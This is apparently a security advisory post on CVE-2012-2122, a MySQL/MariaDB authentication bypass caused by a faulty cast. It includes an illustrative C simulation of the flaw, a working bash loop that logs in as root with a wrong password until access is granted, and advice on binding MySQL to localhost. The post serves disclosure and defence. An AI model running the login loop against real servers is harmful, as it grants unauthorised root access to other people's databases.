CVE-2012-2122: Serious MySQL Authentication Bypass Vulnerability
A serious security bug in MariaDB and MySQL has been disclosed. According to the advisory, all MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are vulnerable. The issue was assigned the ID CVE-2012-2122.
"When a user connects to MariaDB/MySQL, a token (SHA over a password and a random scramble string) is calculated and compared with the expected value. Because of incorrect casting, it might've happened that the token and the expected value were considered equal, even if the memcmp() returned a non-zero value. In this case MySQL/MariaDB would think that the password is correct, even while it is not. Because the protocol uses random strings, the probability of hitting this bug is about 1/256."
"Which means, if one knows a user name to connect (and "root" almost always exists), she can connect using *any* password by repeating connection attempts. ~300 attempts takes only a fraction of second, so basically account password protection is as good as nonexistent. Any client will do, there's no need for a special libmysqlclient library."
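The casting flaw the advisory describes, as an added C example (not code from the advisory or from MySQL/MariaDB). It assumes the comparison result is narrowed to an 8-bit type; `bool8`, `wide_cmp` and the other names are constructed stand-ins, and the expected token is a constructed value.

```c
#include <stdio.h>
#include <string.h>

#define TOKEN_LEN 20   /* SHA-1 sized token */
typedef char bool8;    /* assumption: result is narrowed to an 8-bit type */
typedef bool8 (*mismatch_fn)(const unsigned char *, const unsigned char *);

/* Constructed stand-in for an optimized memcmp(): C fixes only the sign of the
 * result, so any non-zero int is legal. Compares 16-bit big-endian chunks. */
static int wide_cmp(const unsigned char *a, const unsigned char *b, size_t n) {
    for (size_t i = 0; i + 1 < n; i += 2) {
        int x = (a[i] << 8) | a[i + 1], y = (b[i] << 8) | b[i + 1];
        if (x != y)
            return x - y;
    }
    return 0;
}

/* Flawed: non-zero means "mismatch", but only the low 8 bits survive. */
static bool8 mismatch_flawed(const unsigned char *tok, const unsigned char *expect) {
    return (bool8)wide_cmp(tok, expect, TOKEN_LEN);
}

/* Corrected: reduce the result to 0 or 1 before it is narrowed. */
static bool8 mismatch_fixed(const unsigned char *tok, const unsigned char *expect) {
    return wide_cmp(tok, expect, TOKEN_LEN) != 0;
}

/* Try every value of the first two token bytes; count wrong tokens accepted. */
static int count_false_accepts(mismatch_fn mismatch) {
    unsigned char expect[TOKEN_LEN], tok[TOKEN_LEN];
    int accepted = 0;
    memset(expect, 0x5a, sizeof expect);   /* constructed expected token */
    memcpy(tok, expect, sizeof tok);
    for (int v = 0; v < 65536; v++) {
        tok[0] = (unsigned char)(v >> 8); tok[1] = (unsigned char)v;
        if (memcmp(tok, expect, TOKEN_LEN) != 0 && !mismatch(tok, expect))
            accepted++;
    }
    return accepted;
}

int main(void) {
    printf("flawed=%d fixed=%d\n", count_false_accepts(mismatch_flawed),
           count_false_accepts(mismatch_fixed));
    return 0;
}
```

Of the 65,535 wrong tokens tried, 255 pass the flawed check, which is roughly the 1/256 rate quoted above, and none pass the corrected one.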
The following one-liner in bash will provide access to an affected MySQL server as the root user account, without actually knowing the password.
$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done
mysql>
Defense: The first rule of securing MySQL is to not expose it to the network at large in the first place. Most Linux distributions bind the MySQL daemon to localhost, preventing remote access to the service. In cases where network access must be provided, MySQL also provides host-based access controls. There are few use cases where the MySQL daemon should be intentionally exposed to the wider network without any form of host-based access control.
The easiest thing to do is to modify the my.cnf file to restrict access to the local system. Open my.cnf with the editor of your choice, find the section labeled [mysqld] and change (or add a new line to set) the "bind-address" parameter to "127.0.0.1". Restart the MySQL service to apply this setting.